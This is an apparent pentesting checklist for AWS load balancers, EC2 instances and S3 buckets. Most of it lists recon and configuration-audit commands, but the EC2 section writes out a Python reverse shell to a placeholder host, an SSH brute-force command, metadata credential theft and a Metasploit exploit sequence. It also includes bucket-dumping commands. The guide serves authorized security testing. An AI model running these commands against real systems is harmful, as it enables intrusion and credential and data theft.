💻AWS

AWS Penetration Testing: Load Balancer (ELB), EC2, and S3

When performing penetration testing on AWS infrastructure, including Load Balancers (ELB), EC2 instances, and S3 buckets, it's crucial to focus on practical tools, commands, and methodologies specific to these services. Below is a comprehensive checklist, categorized by service.


1. Elastic Load Balancer (ELB) Penetration Testing

Checklist:

  1. Identify ELB IP Addresses:

    • Use tools like nslookup or dig to identify IP addresses associated with the ELB.

      dig elb-domain-name.com
      nslookup elb-domain-name.com
    • Check for DNS misconfigurations:

      • Ensure that DNS entries do not leak internal IP addresses or other sensitive information.

  2. SSL/TLS Configuration:

    • Testing for SSL/TLS Weaknesses:

      • Use sslscan or nmap to check for SSL vulnerabilities.

        sslscan elb-domain-name.com
        nmap --script ssl-enum-ciphers -p 443 elb-domain-name.com
    • Check SSL/TLS certificate validity and configuration:

      • Validate the SSL certificate using openssl.

        openssl s_client -connect elb-domain-name.com:443
    • Scan for supported protocols:

      • Ensure that outdated or vulnerable SSL/TLS versions are disabled.

  3. CORS Misconfiguration:

    • Test for CORS issues:

      • Use tools like curl or Burp Suite to verify CORS headers.

        curl -I https://elb-domain-name.com
    • Check for overly permissive CORS policies that might expose sensitive resources.

  4. HTTP/HTTPS Security Headers:

    • Security Header Check:

      • Verify HTTP headers like X-Frame-Options, X-Content-Type-Options, Content-Security-Policy.

        curl -I https://elb-domain-name.com
  5. Load Balancer Configuration Review:

    • Check for redundant listeners:

      • Verify that only necessary protocols (HTTP, HTTPS) are exposed.

    • Health Check Mechanisms:

      • Ensure the health check configurations do not expose sensitive information.

Tools:

  • nmap

  • sslscan

  • curl

  • Burp Suite

  • openssl


2. EC2 Instance Penetration Testing

Checklist:

  1. Instance Enumeration:

    • Identify EC2 instance IPs and associated services:

      • Utilize nmap to scan for open ports and services.

        nmap -sS -sV -p- ec2-instance-ip
  2. Service Vulnerability Scanning:

    • Scan for outdated software:

      • Use tools like Nessus, OpenVAS, or Nikto.

      • Example with nikto:

        nikto -h http://ec2-instance-ip
  3. Brute Force SSH (If SSH is enabled):

    • Test for weak SSH credentials:

      • Use Hydra or Medusa to perform brute force attacks.

        hydra -l root -P /path/to/wordlist.txt ssh://ec2-instance-ip
  4. Privilege Escalation:

    • Check for Sudo Privileges and Weak Configurations:

      • Run sudo -l to check for potential privilege escalation paths.

      • Exploit potential SUID binaries or misconfigurations.

  5. Reverse Shell and Persistence:

    • Establish a reverse shell:

      • Use a simple Python reverse shell payload:

        python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("your-ip",your-port)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    • Check for AWS IAM roles attached to the instance:

      • Examine the instance metadata:

        curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
  6. AWS CLI Credential Harvesting:

    • Check for stored AWS credentials:

      • Locate credentials in ~/.aws/credentials.

      • Use aws cli to enumerate IAM roles and policies.

        aws iam list-users --profile compromised-profile
  7. Exploit Known Vulnerabilities:

    • Exploit software vulnerabilities:

      • Use tools like Metasploit to exploit known vulnerabilities.

        msfconsole
        use exploit/multi/http/struts2_content_type_ognl
        set RHOST ec2-instance-ip
        run

Tools:

  • nmap

  • Nikto

  • Hydra

  • Metasploit

  • AWS CLI

  • curl


3. S3 Bucket Penetration Testing

Checklist:

  1. Bucket Enumeration:

    • Identify S3 buckets:

      • Use tools like awscli, S3Scanner, or s3recon.

        aws s3 ls s3://bucket-name --region region
      • Use S3Scanner to find open S3 buckets:

        python s3scanner.py bucket-name
  2. Bucket Access Control:

    • Check for publicly accessible buckets:

      • Test for public read/write access.

        aws s3api get-bucket-acl --bucket bucket-name
    • Test Bucket Policies:

      • Use the AWS CLI to view and assess the bucket's IAM policies.

        aws s3api get-bucket-policy --bucket bucket-name
  3. Data Extraction:

    • Download accessible data:

      • If the bucket is publicly accessible, download its contents:

        aws s3 sync s3://bucket-name ./local-directory --region region
    • Search for sensitive data:

      • Use tools like truffleHog to search for secrets in files.

        trufflehog --regex --entropy=True s3://bucket-name
  4. Bucket Enumeration via Brute Force:

    • Brute force potential bucket names:

      • Use S3 brute force tools like LazyS3.

        python LazyS3.py company-name
  5. Exploit S3 vulnerabilities:

    • Check for common S3 misconfigurations:

      • Look for misconfigured CORS policies or website configurations.

        aws s3api get-bucket-cors --bucket bucket-name
        aws s3api get-bucket-website --bucket bucket-name

Tools:

  • awscli

  • S3Scanner

  • truffleHog

  • LazyS3

  • curl


This list covers essential steps and tools for conducting penetration tests on AWS services, focusing on ELB, EC2, and S3. Each tool and command is selected based on its relevance to practical penetration testing scenarios specific to these AWS components. Conduct thorough testing while ensuring that you have permission from the target's owner to avoid legal issues.

Last updated